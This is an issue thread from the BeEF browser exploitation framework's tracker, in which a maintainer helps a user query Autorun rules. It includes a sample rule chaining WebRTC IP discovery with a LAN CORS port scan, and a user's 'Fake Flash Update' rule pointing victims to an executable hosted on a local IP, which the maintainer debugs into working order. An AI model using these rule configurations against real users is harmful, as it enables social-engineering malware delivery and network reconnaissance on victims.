### ISSUE TITLE
How do I see the names and options of the modules in autorun? Probably a noob question

### ISSUE THREAD

**Issue by rayluch** [beefproject/beef#1284]
I know this may be a noob question, but I have followed your instructions and I have used this command in order to see the options and the name of the module:

curl http://192.168.1.118:3000/api/autorun/rule/list/88?token=xyz

But it doesn't show anything.

Where can I see the names and the options of the modules? Thank you very much!

**Comment by bcoles** [comment]
Hi @rayluch

The example request you're using should work. Do you have any ARE rules enabled?

Here's an example request and response to grab the second ARE rule:

```bash
$ curl -isk http://127.0.0.1:3000/api/autorun/rule/list/2?token=d6b73139a6c8ba51596dfc9d51adfdd1f7e306b6
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Cache-Control: no-cache
Expires: 0
Content-Length: 704
X-Content-Type-Options: nosniff
Connection: keep-alive

{"success":true,"rules":{"id":2,"name":"LAN CORS Scan","author":"bcoles","browser":"[\"FF\", \"C\"]","browser_version":"ALL","os":"ALL","os_version":"ALL","modules":"[{\"name\":\"get_internal_ip_webrtc\",\"condition\":null,\"code\":null,\"options\":{}},{\"name\":\"cross_origin_scanner_cors\",\"condition\":\"status==1\",\"code\":\"var s=get_internal_ip_webrtc_mod_output.split('.');var start = s[0]+'.'+s[1]+'.'+s[2]+'.1'; var end = s[0]+'.'+s[1]+'.'+s[2]+'.255'; var mod_input = start+'-'+end;\",\"options\":{\"ipRange\":\"<<mod_input>>\",\"ports\":\"80,8080\",\"threads\":\"2\",\"wait\":\"2\",\"timeout\":\"10\"}}]","execution_order":"[0, 1]","execution_delay":"[0, 0]"
```

You can see the module parameters and values in the `options` JSON key.

**Comment by rayluch** [comment]
If I use the command you mentioned I get this output:

curl -isk http://127.0.0.1:3000/api/autorun/rule/list/2?token=mytoken
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Server: Apache/2.2.3 (CentOS)
Pragma: no-cache
Cache-Control: no-cache
Expires: 0
Content-Length: 29
X-Content-Type-Options: nosniff
Connection: keep-alive

{"success":true,"rules":null}

It happens with every single rule. I have tried using "command.js" to see the options of "fake flash update" and this is what I have done:

{"name": "Fake Flash Update",
  "author": "mgeeky",
  "browser": "ALL",
  "browser_version": "ALL",
  "os": "Windows",
  "os_version": "ALL",
  "modules": [
    {"name": "fake_flash_update",
      "condition": null,
      "options": {
		"image": "http://192.168.1.103:3000/adobe/flash_update.png",
		"payload_type": "Custom_Payload",
		"payload_uri": "http://192.168.1.103/install_flash_player.exe",
      }
    }
  ],
  "execution_order": [0],
  "execution_delay": [0],
  "chain_mode": "sequential"
}

But it doesn't work. I hope you can spare a few minutes to help me understand what am I doing wrong. Thank you.

**Comment by bcoles** [comment]
@rayluch Are you getting any console output from the ARE? The enabled ARE rules should be dumped to console upon startup.

I'm not sure I understand what you're trying to achieve with the REST API. At a guess, I suspect perhaps you haven't moved the ARE rules you wish to enable from the `arerules` directory to `arerules/enabled`.

Regarding your example ARE rule, the options for the Fake Flash Update module are `image`, **`payload`**, and `payload_uri`. Your ARE rule uses **`payload_type`** rather than `payload` which is likely the cause of your issue.

If you want to see all available options for a module, rather than the currently configured options and values for a specific configured ARE rule, check the [module.rb](https://github.com/beefproject/beef/blob/master/modules/social_engineering/fake_flash_update/module.rb) file associated with the module.

**Comment by bcoles** [comment]
@rayluch did you get this working?

**Comment by rayluch** [comment]
Yes I did, thank you very much!
